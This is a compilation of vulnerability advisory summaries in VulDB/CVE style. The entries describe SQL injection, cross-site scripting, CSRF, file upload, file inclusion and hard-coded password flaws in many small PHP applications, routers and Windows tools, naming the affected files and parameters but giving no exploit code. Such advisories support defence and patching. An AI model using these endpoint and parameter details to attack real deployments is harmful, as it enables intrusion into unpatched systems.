A vulnerability was found in itsourcecode Airline Reservation System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273623.
A vulnerability has been found in itsourcecode Airline Reservation System 1.0 and classified as critical. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument page leads to file inclusion. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273622 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Laravel Accounting System 1.0. This affects an unknown part of the file app/Http/Controllers/HomeController.php. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273621 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Clinics Patient Management System 1.0. Affected by this issue is some unknown functionality of the file /new_prescription.php. The manipulation of the argument patient leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273620.
A vulnerability has been found in PMWeb 7.2.00 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Web Application Firewall. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273559. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in ForIP Tecnologia Administração PABX 1.x. It has been rated as critical. Affected by this issue is some unknown functionality of the file /authMonitCallcenter of the component monitcallcenter. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273554 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in OSWAPP Warehouse Inventory System 1.0/2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /change_password.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273553 was assigned to this vulnerability.
A vulnerability was found in OSWAPP Warehouse Inventory System 1.0/2.0. It has been classified as problematic. Affected is an unknown function of the file /edit_account.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273552.
A vulnerability was found in elunez eladmin up to 2.7 and classified as critical. This issue affects some unknown processing of the file /api/deploy/upload /api/database/upload of the component Database Management/Deployment Management. The manipulation of the argument file leads to path traversal: 'dir/../../filename'. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273551.
A vulnerability, which was classified as critical, was found in itsourcecode Tailoring Management System 1.0. This affects an unknown part of the file partedit.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273549 was assigned to this vulnerability.
A vulnerability was found in FastAdmin 1.5.0.20240328. It has been declared as problematic. This vulnerability affects unknown code of the file /[admins_url].php/general/attachment/edit/ids/4?dialog=1 of the component Attachment Management Section. The manipulation of the argument row[url]/row[imagewidth]/row[imageheight] leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273544.
A vulnerability was found in itsourcecode Placement Management System 1.0. It has been classified as critical. This affects an unknown part of the file view_company.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273543.
A vulnerability was found in itsourcecode Placement Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file apply_now.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273542 is the identifier assigned to this vulnerability.
A vulnerability has been found in itsourcecode Placement Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /resume_upload.php of the component Image Handler. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273541 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Placement Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273540.
A vulnerability, which was classified as critical, was found in itsourcecode Ticket Reservation System 1.0. This affects an unknown part of the file list_tickets.php. The manipulation of the argument prefSeat_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273531.
A vulnerability, which was classified as critical, has been found in itsourcecode Ticket Reservation System 1.0. Affected by this issue is some unknown functionality of the file checkout_ticket_save.php. The manipulation of the argument data leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273530 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in itsourcecode Ticket Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php of the component Login Page. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273529 was assigned to this vulnerability.
A vulnerability has been found in SimpleMachines SMF 2.1.4 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php?action=profile;u=2;area=showalerts;do=read of the component User Alert Read Status Handler. The manipulation of the argument aid leads to improper control of resource identifiers. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SimpleMachines SMF 2.1.4. Affected is an unknown function of the file /index.php?action=profile;u=2;area=showalerts;do=remove of the component Delete User Handler. The manipulation of the argument aid leads to improper control of resource identifiers. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /manage_question.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273362 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester Simple Realtime Quiz System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view_result.php. The manipulation of the argument qid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273361 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Simple Realtime Quiz System 1.0. Affected is an unknown function of the file /print_quiz_records.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273360.
A vulnerability, which was classified as critical, has been found in SourceCodester Simple Realtime Quiz System 1.0. This issue affects some unknown processing of the file /my_quiz_result.php. The manipulation of the argument quiz leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273359.
A vulnerability classified as critical was found in SourceCodester Simple Realtime Quiz System 1.0. This vulnerability affects unknown code of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273358 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Simple Realtime Quiz System 1.0. This affects an unknown part of the file /ajax.php?action=load_answered. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273357 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /quiz_board.php. The manipulation of the argument quiz leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273356.
A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /quiz_view.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273355.
A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0. It has been classified as critical. Affected is an unknown function of the file /manage_quiz.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273354 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0 and classified as critical. This issue affects some unknown processing of the file /ajax.php?action=login of the component Login. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273353 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Simple Realtime Quiz System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /ajax.php?action=save_quiz. The manipulation of the argument title leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273352.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Realtime Quiz System 1.0. This affects an unknown part of the file /ajax.php?action=save_user. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273351.
A vulnerability was found in SourceCodester Tracking Monitoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file /ajax.php?action=login of the component Login. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273345 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Tracking Monitoring Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /manage_establishment.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273344.
A vulnerability has been found in SourceCodester Tracking Monitoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage_records.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273343.
A vulnerability, which was classified as critical, was found in SourceCodester Tracking Monitoring Management System 1.0. Affected is an unknown function of the file /manage_person.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273342 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Tracking Monitoring Management System 1.0. This issue affects some unknown processing of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273341 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Tracking Monitoring Management System 1.0. This vulnerability affects unknown code of the file /ajax.php?action=save_establishment. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273340.
A vulnerability classified as problematic has been found in SourceCodester Tracking Monitoring Management System 1.0. This affects an unknown part of the file /ajax.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273339.
A vulnerability was found in SourceCodester Tracking Monitoring Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /ajax.php?action=save_establishment. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273338 is the identifier assigned to this vulnerability.
A vulnerability was found in Point B Ltd Getscreen Agent 2.19.6 on Windows. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file getscreen.msi of the component Installation. The manipulation leads to creation of temporary file with insecure permissions. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-273337 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but was not able to provide a technical response in time.
A vulnerability was found in Baidu UEditor 1.4.2. It has been declared as problematic. This vulnerability affects unknown code of the file /ueditor142/php/controller.php?action=catchimage. The manipulation of the argument source[] leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Baidu UEditor 1.4.3.3. It has been classified as problematic. This affects an unknown part of the file /ueditor/php/controller.php?action=uploadfile&amp;encode=utf-8. The manipulation of the argument upfile leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273273 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273262 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in TOTOLINK CP450 4.1.0cu.747_B20191224. It has been classified as critical. This affects an unknown part of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded password. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in YouDianCMS 7. Affected is an unknown function of the file /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php. The manipulation of the argument files leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in YouDianCMS 7. This issue affects some unknown processing of the file /t.php?action=phpinfo. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in IObit DualSafe Password Manager 1.4.0.3. This affects an unknown part in the library RTL120.BPL of the component BPL Handler. The manipulation leads to uncontrolled search path. It is possible to launch the attack on the local host. The identifier VDB-273249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in IObit Driver Booster 11.0.0.0. It has been rated as critical. Affected by this issue is some unknown functionality in the library VCL120.BPL of the component BPL Handler. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The identifier of this vulnerability is VDB-273248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in IObit iTop Data Recovery Pro 4.4.0.687. It has been declared as critical. Affected by this vulnerability is an unknown functionality in the library madbasic_.bpl of the component BPL Handler. The manipulation leads to uncontrolled search path. Local access is required to approach this attack. The associated identifier of this vulnerability is VDB-273247. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in itsourcecode Online Blood Bank Management System 1.0. This vulnerability affects unknown code of the file signup.php of the component User Registration Handler. The manipulation of the argument user leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273232.
A vulnerability classified as critical has been found in itsourcecode Online Blood Bank Management System 1.0. This affects an unknown part of the file /admin/index.php of the component Admin Login. The manipulation of the argument user leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273231.
A vulnerability was found in code-projects Online Bus Reservation Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file register.php. The manipulation of the argument Email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273203.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file sort_user.php. The manipulation of the argument sort leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273202 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Record Management System 1.0. It has been classified as problematic. This affects an unknown part of the file entry.php. The manipulation of the argument school leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273201 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Establishment Billing Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /view_bill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273200.
A vulnerability has been found in SourceCodester Establishment Billing Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage_billing.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273199.
A vulnerability, which was classified as critical, was found in SourceCodester Establishment Billing Management System 1.0. Affected is an unknown function of the file /manage_block.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273198 is the identifier assigned to this vulnerability.
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /request.php of the component Send Blood Request Page. The manipulation of the argument Address/bloodgroup leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273185 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in Bolt CMS 3.7.1. Affected is an unknown function of the file /bolt/editcontent/showcases of the component Showcase Creation Handler. The manipulation of the argument title/textarea leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Bolt CMS 3.7.1. It has been rated as problematic. This issue affects some unknown processing of the file /preview/page of the component Entry Preview Handler. The manipulation of the argument body leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273167. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed that the affected release tree is end-of-life.
A vulnerability classified as critical has been found in SourceCodester Establishment Billing Management System 1.0. This affects an unknown part of the file /manage_tenant.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273159.
A vulnerability was found in SourceCodester Establishment Billing Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /manage_payment.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273158 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Establishment Billing Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /ajax.php?action=delete_block. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273157 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Establishment Billing Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273156.
A vulnerability was found in SourceCodester Establishment Billing Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/ajax.php?action=login of the component Login. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273155.
A vulnerability has been found in SourceCodester Establishment Billing Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /admin/ajax.php?action=save_settings. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273154 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Lot Reservation Management System 1.0. This affects an unknown part of the file /admin/ajax.php?action=save_settings. The manipulation of the argument about leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273153 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester Lot Reservation Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273152.
A vulnerability classified as critical was found in SourceCodester Lot Reservation Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/manage_model.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273151.
A vulnerability classified as critical has been found in SourceCodester Lot Reservation Management System 1.0. Affected is an unknown function of the file /admin/index.php?page=manage_lot. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273150 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Lot Reservation Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/view_reserved.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273149 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Lot Reservation Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273148.
A vulnerability was found in itsourcecode Alton Management System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/team_save.php. The manipulation of the argument team leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273147.
A vulnerability was found in itsourcecode Alton Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/menu.php of the component Add a Menu. The manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273146 is the identifier assigned to this vulnerability.
A vulnerability has been found in itsourcecode Alton Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/member_save.php. The manipulation of the argument last/first leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273145 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Alton Management System 1.0. Affected is an unknown function of the file /admin/category_save.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273144.
A vulnerability, which was classified as critical, has been found in itsourcecode Alton Management System 1.0. This issue affects some unknown processing of the file /reservation_status.php. The manipulation of the argument rcode leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273143.
A vulnerability classified as critical was found in itsourcecode Alton Management System 1.0. This vulnerability affects unknown code of the file search.php. The manipulation of the argument rcode leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273142 is the identifier assigned to this vulnerability.
Any project that parses untrusted Protocol Buffers data containing an arbitrary number of nested groups / series of SGROUP tags can corrupted by exceeding the stack limit i.e. StackOverflow. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.
A vulnerability was found in SourceCodester Medicine Tracker System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /classes/Users.php?f=save_user of the component Password Change Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-272806 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Insurance Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /Script/admin/core/update_policy of the component Edit Insurance Policy Page. The manipulation of the argument pname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272805 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Lot Reservation Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /lot_details.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272804.
A vulnerability has been found in SourceCodester Lot Reservation Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view_model.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272803.
A vulnerability, which was classified as critical, was found in SourceCodester Lot Reservation Management System 1.0. Affected is an unknown function of the file /home.php. The manipulation of the argument type leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272802 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in SourceCodester School Log Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272792.
A vulnerability classified as critical was found in SourceCodester School Log Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/print_barcode.php. The manipulation of the argument tbl leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272791.
A vulnerability classified as critical has been found in SourceCodester School Log Management System 1.0. Affected is an unknown function of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272790 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester School Log Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /admin/ajax.php?action=save_student. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272789 was assigned to this vulnerability.
A vulnerability was found in TOTOLINK LR1200 9.3.1cu.2832. It has been classified as problematic. This affects an unknown part of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in SourceCodester Complaints Report Management System 1.0. This issue affects some unknown processing of the file /admin/ajax.php?action=save_settings. The manipulation of the argument name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272621 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Complaints Report Management System 1.0. This vulnerability affects unknown code of the file /admin/manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272620.
A vulnerability classified as critical has been found in SourceCodester Complaints Report Management System 1.0. This affects an unknown part of the file /admin/manage_station.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272619.
A vulnerability was found in SourceCodester Complaints Report Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/manage_complaint.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272618 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Complaints Report Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272617 was assigned to this vulnerability.
A vulnerability was found in itsourcecode Society Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/check_admin.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272616.
A vulnerability was found in itsourcecode Society Management System 1.0 and classified as critical. This issue affects some unknown processing of the file check_student.php. The manipulation of the argument student_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272615.
A vulnerability has been found in Mp3tag up to 3.26d and classified as problematic. This vulnerability affects unknown code in the library tak_deco_lib.dll of the component DLL Handler. The manipulation leads to uncontrolled search path. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 3.26e is able to address this issue. It is recommended to upgrade the affected component. VDB-272614 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product.
A vulnerability, which was classified as critical, was found in itsourcecode Society Management System 1.0. This affects an unknown part of the file /admin/student.php. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272613 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in itsourcecode Society Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/get_balance.php. The manipulation of the argument student_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272612.
A vulnerability classified as critical was found in itsourcecode Society Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/get_price.php. The manipulation of the argument expenses_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272611.
A vulnerability classified as critical has been found in itsourcecode Online Food Ordering System 1.0. Affected is an unknown function of the file editproduct.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-272610 is the identifier assigned to this vulnerability.
A vulnerability was found in Bylancer Quicklancer 2.4. It has been rated as critical. This issue affects some unknown processing of the file /listing of the component GET Parameter Handler. The manipulation of the argument range2 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272609 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in TOTOLINK A3000RU 5.9c.5185. It has been rated as problematic. This issue affects some unknown processing of the file /web_cste/cgi-bin/product.ini. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-272591. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
